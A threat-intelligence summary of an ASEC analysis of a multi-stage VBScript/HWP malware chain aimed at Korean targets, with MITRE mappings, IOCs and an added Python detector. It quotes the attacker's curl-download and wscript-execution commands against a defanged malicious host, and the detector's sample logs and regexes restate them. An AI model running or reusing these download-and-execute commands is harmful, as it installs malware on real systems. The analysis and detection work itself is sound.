Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) – ASEC BLOG

An ASEC analysis outlines a multi-stage malware chain that begins with a VBScript downloader fetched via curl and ultimately retrieves and runs a malicious HWP document. The attackers use persistence, dynamic command delivery, and execution of remotely served scripts; the HWP file's author field and related context indicate Korean targets. #HappyBirthday #TransWallpaper #KoreanPeninsulaPeaceEducationPlatform #Datkka #GoogledocsCloudns #AhnLab

Keypoints

  • Initial delivery uses curl to download a VBScript (vbtemp) into the APPDATA folder, marking the first stage of the dropper.
  • The VBScript is executed with wscript, enabling further script execution from the downloaded components.
  • The HWP dropper creates HappyBirthday.vbs in the %temp% folder and uses a relative link inside the HWP to trigger the VBScript, requiring user interaction.
  • A TransWallpaper file is created and registered in Task Scheduler to persist and re-run the payload every 30 minutes.
  • The HWP/TransWallpaper chain fetches commands from down.php, enabling attacker-controlled actions such as executing calc or other commands.
  • HappyBirthday.vbs downloads another script from driver.googledocs.cloudns.nz/Yb/yb and executes it, expanding the payload beyond the initial drop.
  • The HWP file’s author is linked to a Korean Peninsula Peace Education Platform, indicating targeted victims with North Korea connections.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – VBScript and HWP files are downloaded from remote URLs using curl and saved as %APPDATA%\vbtemp. “curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\vbtemp”
  • [T1059.005] Command and Scripting Interpreter – The vbtemp file is executed via wscript with the VBScript engine, enabling script execution. “The vbtemp file is run through the wscript //e:vbscript //b %APPDATA%\vbtemp”
  • [T1204.002] User Execution – The HWP file’s link requires user interaction to trigger execution of the nested VBScript. “When the user clicks the link, the ..\AppData\Local\Temp\HappyBirthday (2).vbs file is executed.”
  • [T1053.005] Scheduled Task – The TransWallpaper file is registered in the task scheduler to run every 30 minutes. “The created TransWallpaper file is registered in the task scheduler, enabling the script to be executed every 30 minutes.”
  • [T1071.001] Web Protocols – The script retrieves commands and payloads from remote servers via HTTP(S) endpoints (down.php and Googledocs Cloudns). “The script file executes additional commands received from hxxp://datkka.atwebpages[.]com/down.php” and “hxxps://driver.googledocs.cloudns[.]nz/Yb/yb”
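As an added defender-side example (not code from the ASEC report), the following Python scans process-creation command lines for the stages of the chain described above: the curl download into %APPDATA%, the wscript //e:vbscript launch, the 30-minute scheduled task, and a VBScript run from the user's Temp folder. The log lines are constructed samples, and the schtasks pattern is an assumption, since the report only states that the task runs every 30 minutes without showing the registration command.

```python
import re

# Patterns derived from the behaviours described in the write-up.
# The schtasks form is an assumption: the report does not show how the
# TransWallpaper task was registered, only that it fires every 30 minutes.
PATTERNS = {
    "T1105 curl download saved under %APPDATA%": re.compile(
        r'curl\b.*-H\s+"?user-agent:.*-o\s+%appdata%', re.IGNORECASE),
    "T1059.005 wscript with VBScript engine override": re.compile(
        r"wscript(\.exe)?\s+//e:vbscript\s+//b\s+", re.IGNORECASE),
    "T1053.005 scheduled task every 30 minutes (assumed schtasks form)": re.compile(
        r"schtasks.*/create.*/sc\s+minute\s+/mo\s+30", re.IGNORECASE),
    "T1204.002 VBScript launched from AppData\\Local\\Temp": re.compile(
        r'\\AppData\\Local\\Temp\\[^\\"]*\.vbs', re.IGNORECASE),
}

# Constructed sample command lines (Sysmon-style), not data from the report.
SAMPLE_LOGS = [
    'CommandLine: curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" '
    'hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp',
    'CommandLine: wscript //e:vbscript //b C:\\Users\\victim\\AppData\\Roaming\\vbtemp',
    'CommandLine: schtasks /create /tn TransWallpaper /sc minute /mo 30 /tr wscript.exe',
    'CommandLine: wscript.exe "C:\\Users\\victim\\AppData\\Local\\Temp\\HappyBirthday (2).vbs"',
    'CommandLine: notepad.exe C:\\Users\\victim\\Documents\\notes.txt',
]


def scan(lines):
    """Return (line_number, technique) pairs for every line matching a pattern."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for name, rx in PATTERNS.items():
            if rx.search(line):
                hits.append((n, name))
    return hits


def chain_detected(hits, min_stages=2):
    """True when at least min_stages distinct stages appear in one log set."""
    return len({name for _, name in hits}) >= min_stages


if __name__ == "__main__":
    found = scan(SAMPLE_LOGS)
    for n, name in found:
        print(f"line {n}: {name}")
    print("multi-stage chain detected:", chain_detected(found))
```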

Indicators of Compromise

  • [Hash] 7c38b40ec19609f32de2a70d409c38b0 (vbs), 60d117f5cb7b0f8133967ec535c85c6a (vbs)
  • [Hash] d86d57c1d8670d510e7b7a1ad7db9fd2 (vbs), ca2917006eb29171c9e5f374e789f53a (vbs)
  • [URL] hxxp://datkka.atwebpages[.]com/2vbs, hxxp://datarium.epizy[.]com/2vbs
  • [URL] hxxp://datkka.atwebpages[.]com/mal, hxxp://datkka.atwebpages[.]com/down.php
  • [URL] hxxps://driver.googledocs.cloudns[.]nz/Yb/yb
  • [File] 1.hwp, HappyBirthday.vbs

Read more: https://asec.ahnlab.com/en/38203/